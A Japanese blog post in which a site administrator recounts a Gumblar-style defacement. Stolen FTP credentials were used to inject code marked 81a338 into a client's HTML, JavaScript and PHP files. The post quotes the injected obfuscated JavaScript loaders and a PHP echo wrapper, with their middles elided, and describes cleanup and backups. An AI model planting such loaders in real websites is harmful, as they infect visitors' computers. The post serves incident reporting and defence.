WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

*

サブコンテンツ

危険な高額塾

タグ

池田純矢 google テーマ スマホ インターネットエクスプローラー デスクトップ 申請金ビジネス 株式会社A-ブログレス Adobe アンダーグラウンドアフィリエイトクラブ ざくざく君 Thunderbird BUYMA EC ブラウザ 関根義光 アフィリエイト Login LockDown ネットビジネス最後の楽園 ロリポップ 中山秀人 人物 与沢翼×蝶乃舞 インターネットビジネススクール プロモーション ボタン Line アレックス式ネオせどりスクール インターネット High Concept Marketing 比較 インペリアルゴールド ソース 宮田麗花 特権ビジネス ハート Ban Hammer ヤフオク postpost アクセス制限 ネットショップ バイドゥー 不正アクセス 自動 がら空きビジネス office ウインドウ 切抜き アフィ匠 ECサイト 定型文 アンダーグラウンドメソッド レイアウト 感染 @PAGES クラック 81a338 MovableTYpe エディタ 与沢翼 ネットゲーム 大園転売塾 スムーズ スカイプ 伊藤 歩 高速ゲーム バナー サンタ document.all FTP getElementByTagName バックアップ プロファイル フレンドシップメール ping クラウド変換 やしろひろたみ 自動化 加工 マニュアル 転売大園塾 css 配布 株式会社Free Agent Style コピーボタン 詐欺組織 クロスアフィリエイト followmatic Newpost Catch Tiger-Wing せどり ドメイン 伊藤虎太郎 改ざん メモ ランキング 不正送信 アクセスアップ ブラクラ 脆弱性 ライオンアフィリエイト 放射線 管理ツール モザイク Extension Manager 不労所得の神 流出 html Firefox ヤフー PHP 関根塾 三橋美仁 登録禁止 Baidu 短縮URLツール 大園麗花 Cash on Wordpress レビュー SmoothScroll.js 復元 プラグイン 切り抜き wpXサーバー Diamond Affiliate Masters Program WP 上位表示 高額塾 ソースコード 副業術 秀吉塾天下統一 パズル ツール Windows グラデーション 原田真 リンクシェイカー Wordpress Content Slide Windows 7 エクスプローラー XHTML 個人情報流出 ping送信 北川 雅嗣 レタープレス ファビコン 無料オファー HTML4.0 自己アフィリエイト system タイガーウイング 石井匠 Google Maps テンプレート CS5 マイクロソフト android ヤフーショッピング マルウエア 特定のメールアドレス フォローマティック ツイッター Agency Business RMT 滑らか ブラシ explorer ライン Yahoo 固定ページ IP 情報商材 スタイルシート シャンプー 株式会社ニュース Youtube エキスパートメール ブロック 小笠原健一 久積篤史 もざ バイマ 無断送信 tool .htaccess KMSpico Internet Explorer ムーバブルタイプ iphone カスタマイズ ネオヒルズアカデミー 量産 加藤 秀吉 RSS Includes Pages 立体 管理画面 出店料 詐欺 トラフィック FireWorks サイト改ざん レンタルサーバー 株式会社WINGOOD 球体 無料 force puzzle 表示 タスクバー クリックランキング 山下 RSS ソフト やしろ塾 アドセンス twitter 大園式転売塾 Google Maps API レイアウト崩れ WEB 自己アフィリ 背景 ブルートフォースアタック クラウド入力機能 SKナレッジ ネットビジネス大全集 株式会社SRシステム 百度 YouTube Maniax 2017 日本語入力変換ソフト BBIZ Chrome 改竄 SEO ブロックポリシー 到達率 掲示板 蝶乃舞 IE 伊藤 虎太郎 Favicon セキュリティ IBS 株式会社SRシステム ワードプレス 新井浩 JavaScript DOCTYPE MT 優先順位 音量アイコン CGI 大西良幸 ウイルス 個人情報 wordpress LinkShaker wp-login.php 短縮URL メルマガ配信システム アイコン スクロール 伊藤塾 トレンドアフィリエイト MasterCollection 土屋ひろし トレンドキーワード ビジネス アレックス getElementById ネットビジネス KMS認証 ぼかし 画像 既得権益 村上省吾 ネットガレージ ユーチューブマニアクス2017 賢威 エクスチェンジ 権利収入 CS6 SyntaxHighlighter PPC functions.php moza DTD 秒速で1億円稼ぐ男 株式会社バンザイ ライブチャット インフォトップ

アーカイブ

エステトラブル

このページの先頭へ